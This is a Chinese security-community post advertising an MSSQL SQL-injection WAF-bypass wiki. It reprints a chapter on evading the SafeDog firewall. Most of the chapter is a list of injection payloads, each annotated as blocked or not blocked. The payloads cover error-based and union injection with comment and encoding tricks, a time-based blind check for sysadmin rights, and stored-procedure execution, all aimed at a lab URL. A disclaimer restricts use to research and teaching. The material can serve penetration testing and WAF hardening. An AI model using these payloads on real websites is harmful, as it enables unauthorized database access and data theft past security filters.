作者:圈子社区-404
文章虽公开,但转载请保留作者和出处
需要全文转载的请留言
仅供技术交流,勿做非法用途
Wiki目录
基础
1. MSSQL基本信息
2. MSSQL基本语句
3. MSSQL的符号
4. MSSQL注入基本流程
5. MSSQL报错注入简单绕过
6. MSSQL盲注与联合注入中级
1. MSSQL备份与命令拿shell
2. MSSQL提权与站库分离
3. MSSQL——bypass安全狗
4. MSSQL waf过滤一些符号的绕过
节选一篇:
MSSQL——bypass安全狗
0x01 简单的爆错bypass
and 不拦截
and 1 拦截
and -1 不拦截
and -1=-1 不拦截
and ~1 不拦截
and ~1=1 拦截
and ~1=~1 不拦截
and @@version>~1
and (user|1)>-1
and (db_name()|1)>.1
and ~1=(select top 1 name from sysobjects where xtype='u' and name !='info');-- 拦截
and ~1=(select top 1 name from);-- 不拦截
and ~1=(select top 1 name from 1);-- 拦截
and ~1=(select top 1 name from a);-- 拦截
and ~1=(select top 1 name from !);-- 不拦截
and ~1=(select top 1 name from[sysobjects]);--
and ~1=(select top 1 name from[sysobjects] where xtype='u');-- 拦截
and ~1=(select top 1 name from[sysobjects] where xtype=);-- 不拦截
and ~1=(select top 1 name from[sysobjects] where xtype=0x75);--
and ~1=(select top 1 name from[sysobjects] where xtype=0x75 and name not in (CHAR(105)%2BCHAR(110)%2BCHAR(102)%2BCHAR(111),CHAR(97)%2BCHAR(100)%2BCHAR(109)%2BCHAR(105)%2BCHAR(110)));
http://192.168.130.137/1.aspx?id=1 and ~1=(select top 1 table_name fr
om [INFOR
MATION_SCHEMA].[TABLES] where table_name not in (char(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)));--
0x02 简单的联合bypass
union 不拦截
union select 拦截
unionselect 拦截
union/*select*/ 不拦截
union/*!select*/ 拦截
union/*!1select*/ 不拦截
union/*!1*/select--*/ 不拦截
http://192.168.130.137/1.aspx?id=1 union/*!1*/select null,name,null from [info]
--*/
0x03 盲注与储存过程
http://192.168.130.137/1.aspx?id=1--/*%0aif (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--%20*/
http://192.168.130.137/1.aspx?id=1--/*%0aexec xp_create_subdir 'c:text'--%20*/
项目地址: https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI
纸上得来终觉浅,绝知此事要躬行 —— 陆游
关于圈子社区:
圈子社区是一个非盈利,封闭的白帽子技术交流社区。目前成员已有近2000人,拥有业内首个自主研发的实战化靶场,体系化学习和燃爆的交流气氛带你成为真正的大佬,社区专注实战,崇尚技术,如果你也是实战派,请关注我们。
社区地址:(请使用https访问)
https://www.secquan.org
本文始发于微信公众号(Secquan圈子社区):还在为无法过狗而烦恼?MSSQL Bypass Wiki 来了
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论